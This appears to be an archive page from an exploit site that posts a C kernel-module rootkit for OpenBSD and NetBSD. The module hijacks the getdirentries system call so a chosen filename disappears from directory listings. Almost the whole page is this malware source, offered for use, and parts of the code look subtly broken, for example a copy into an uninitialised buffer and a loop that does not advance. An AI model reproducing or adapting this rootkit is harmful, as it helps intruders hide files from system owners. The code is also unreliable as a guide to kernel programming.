evolve or die

file.c

file.c
Posted Jan 5, 2003
Authored by George Dissios | Site frapes.org

OpenBSD and NetBSD LKM which hides files by patching getdirentries().

tags | tool, rootkit
systems | netbsd, unix, openbsd
MD5 | 770290c363c15e13d3eb89a80e65aa4e

file.c

Change Mirror Download
/* OpenBSD (should work also on NetBSD) LKM hiding file using getdirentries */
/* systemcall! */
/* 2002 by gr33k gr33k@frapes.org www.frapes.org www.gm.fh-koeln.de/~ai604 */

#define DONT_PERMIT
#include <sys/param.h>
#include <sys/systm.h>
#include <sys/syscall.h>
#include <sys/mount.h>
#include <sys/conf.h>
#include <sys/syscallargs.h>
#include <sys/exec.h>
#include <sys/lkm.h>
#include <sys/file.h>
#include <sys/filedesc.h>
#include <sys/errno.h>
#include <sys/dirent.h>
#include <sys/proc.h>
#include <sys/syslog.h>
#include <sys/malloc.h>

int my_getdirentries __P((struct proc *, void *, register_t *));
MOD_MISC("HideFile");

static int
HideFile_load(struct lkm_table *lkmtp,int cmd)
{
if(cmd==LKM_E_LOAD)
{
sysent[SYS_getdirentries].sy_call=my_getdirentries;
}
return 0;
}

static int
HideFile_unload(struct lkm_table *lkmtp,int cmd)
{
if(cmd==LKM_E_UNLOAD)
{
sysent[SYS_getdirentries].sy_call=sys_getdirentries;
}
return 0;
}

HideFile(lkmtp,cmd,ver)
struct lkm_table *lkmtp;
int cmd;
int ver;
{
DISPATCH(lkmtp,cmd,ver,HideFile_load,HideFile_unload,lkm_nofunc);
}

int
my_getdirentries(p,v,retval)
struct proc *p;
void *v;
register_t *retval;
{
register struct sys_getdirentries_args *uap=v;
unsigned int tmp,n,t;
struct dirent *dirp2,*dirp3;
char hide[]="top-secret"; /* Edit filename */

getdirentries(p,uap);
tmp=p->p_dupfd;
if(tmp>0)
{
copyin(&(uap->buf),dirp2,tmp);
dirp3=dirp2;
t=tmp;
while(t>0)
{
n=dirp3->d_reclen;
t-=n;
if(strcmp((char*)&(dirp3->d_name), (char*)&hide)==0)
{
if(t!=0)
bcopy((char*)dirp3+n,(char*)dirp3,t);
}
tmp-=n;
}
if(dirp3->d_reclen==0)
t=0;
if(t!=0)
dirp3=(struct dirent*)((char*)dirp3+dirp3->d_reclen);
}
p->p_dupfd=tmp;
copyout(dirp2,&(uap->buf),tmp);
return (0);
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close